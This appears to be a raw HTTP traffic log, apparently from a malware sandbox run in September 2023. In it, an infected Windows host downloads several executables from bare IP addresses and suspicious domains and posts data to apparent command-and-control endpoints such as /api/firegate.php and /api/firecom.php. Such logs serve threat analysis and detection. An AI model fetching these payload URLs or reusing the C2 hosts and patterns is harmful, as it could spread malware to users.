GET /g.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 87.121.221.58 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 06 Sep 2023 04:53:50 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Wed, 06 Sep 2023 04:45:02 GMT ETag: "6a600-604a96811f1a5" Accept-Ranges: bytes Content-Length: 435712 Content-Type: application/x-msdos-program

GET /info/fotos894.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 77.91.68.238 Cache-Control: no-cache

HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Wed, 06 Sep 2023 12:51:20 GMT Accept-Ranges: bytes ETag: "eb428fd5c0e0d91:0" Server: Microsoft-IIS/10.0 Date: Wed, 06 Sep 2023 12:53:50 GMT Content-Length: 848896

GET /autorun.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 194.169.175.232 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 06 Sep 2023 04:53:51 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4 Last-Modified: Tue, 05 Sep 2023 23:34:28 GMT ETag: "4b178-604a511689996" Accept-Ranges: bytes Content-Length: 307576 Content-Type: application/x-msdownload

HEAD /dl/6523.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: hugersi.com Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Wed, 06 Sep 2023 04:53:51 GMT Content-Type: application/octet-stream Content-Length: 281088 Last-Modified: Wed, 06 Sep 2023 04:30:01 GMT Connection: keep-alive ETag: "64f80049-44a00" Accept-Ranges: bytes

GET /dl/6523.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: hugersi.com Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Wed, 06 Sep 2023 04:53:51 GMT Content-Type: application/octet-stream Content-Length: 281088 Last-Modified: Wed, 06 Sep 2023 04:30:01 GMT Connection: keep-alive ETag: "64f80049-44a00" Accept-Ranges: bytes

GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.15.156.229

HTTP/1.1 200 OK Date: Wed, 06 Sep 2023 04:54:14 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 15 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 605 Host: 94.142.138.113

HTTP/1.1 200 OK Date: Wed, 06 Sep 2023 04:54:19 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 94.142.138.131

HTTP/1.1 200 OK Date: Wed, 06 Sep 2023 04:54:19 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 15 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 8093 Host: 45.15.156.229

HTTP/1.1 200 OK Date: Wed, 06 Sep 2023 04:54:22 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /geoip/v2.1/city/me HTTP/1.1 Connection: Keep-Alive Referer: https://www.maxmind.com/en/locate-my-ip-address User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: www.maxmind.com

HTTP/1.1 301 Moved Permanently Date: Wed, 06 Sep 2023 04:54:23 GMT Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=3600 Expires: Wed, 06 Sep 2023 05:54:22 GMT Location: https://www.maxmind.com/geoip/v2.1/city/me Server: cloudflare CF-RAY: 80241d198bddc076-ICN

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 94.142.138.113

HTTP/1.1 200 OK Date: Wed, 06 Sep 2023 04:54:23 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 45.15.156.229

HTTP/1.1 200 OK Date: Wed, 06 Sep 2023 04:54:23 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive Host: 193.42.32.118

HTTP/1.1 302 Found Date: Wed, 06 Sep 2023 04:54:27 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.33 X-Powered-By: PHP/7.2.33 Set-Cookie: WHMCSdN8ZDh5Ye5PW=1hhr3lgp8s4ukkqpc3ro5bm053; path=/; secure; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: https://ironhost.io/index.php Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 45.15.156.229

HTTP/1.1 200 OK Date: Wed, 06 Sep 2023 04:54:29 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 768 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-Robots-Tag: noindex Referrer-Policy: same-origin Last-Modified: Mon, 21 Aug 2023 22:08:28 GMT ETag: "37d-603761e33cf00" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Wed, 06 Sep 2023 05:54:30 GMT Date: Wed, 06 Sep 2023 04:54:30 GMT Connection: keep-alive

GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive Host: 94.142.138.131

HTTP/1.1 200 OK Date: Wed, 06 Sep 2023 04:54:30 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 15 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

HEAD /ummaa.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.9.74.80 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 06 Sep 2023 04:54:31 GMT Content-Type: application/octet-stream Content-Length: 202752 Last-Modified: Thu, 31 Aug 2023 18:17:58 GMT Connection: keep-alive ETag: "64f0d956-31800" Accept-Ranges: bytes

HEAD /super.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.9.74.80 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 06 Sep 2023 04:54:31 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive

POST /api/firecom.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 25 Host: 94.142.138.131

HTTP/1.1 200 OK Date: Wed, 06 Sep 2023 04:54:31 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 3 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /super.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.9.74.80 Cache-Control: no-cache

HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 06 Sep 2023 04:54:31 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive

GET /ummaa.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.9.74.80 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 06 Sep 2023 04:54:31 GMT Content-Type: application/octet-stream Content-Length: 202752 Last-Modified: Thu, 31 Aug 2023 18:17:58 GMT Connection: keep-alive ETag: "64f0d956-31800" Accept-Ranges: bytes

HEAD /f/fikim0809331.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 230809204625331.nes.dtf99.top Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Server: Caddy Status: 404 Not Found X-Powered-By: PHP/7.3.25 Date: Wed, 06 Sep 2023 04:54:32 GMT

GET /f/fikim0809331.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 230809204625331.nes.dtf99.top Cache-Control: no-cache

HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Server: Caddy Status: 404 Not Found X-Powered-By: PHP/7.3.25 Date: Wed, 06 Sep 2023 04:54:32 GMT Content-Length: 17

GET /geoip/v2.1/city/me HTTP/1.1 Connection: Keep-Alive Referer: https://www.maxmind.com/en/locate-my-ip-address User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: www.maxmind.com

HTTP/1.1 301 Moved Permanently Date: Wed, 06 Sep 2023 04:54:32 GMT Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=3600 Expires: Wed, 06 Sep 2023 05:54:32 GMT Location: https://www.maxmind.com/geoip/v2.1/city/me Server: cloudflare CF-RAY: 80241d566de2c078-ICN

POST /api/firecom.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 13 Host: 94.142.138.131

HTTP/1.1 200 OK Date: Wed, 06 Sep 2023 04:54:32 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 15 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firecom.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 69 Host: 94.142.138.131

HTTP/1.1 200 OK Date: Wed, 06 Sep 2023 04:54:33 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 42 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

HEAD /download/WWW14_n.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 94.156.253.187 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 06 Sep 2023 04:54:35 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Thu, 31 Aug 2023 12:39:35 GMT ETag: "768200-6043756299f14" Accept-Ranges: bytes Content-Length: 7766528 Content-Type: application/x-msdos-program

GET /download/WWW14_n.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 94.156.253.187 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 06 Sep 2023 04:54:35 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Thu, 31 Aug 2023 12:39:35 GMT ETag: "768200-6043756299f14" Accept-Ranges: bytes Content-Length: 7766528 Content-Type: application/x-msdos-program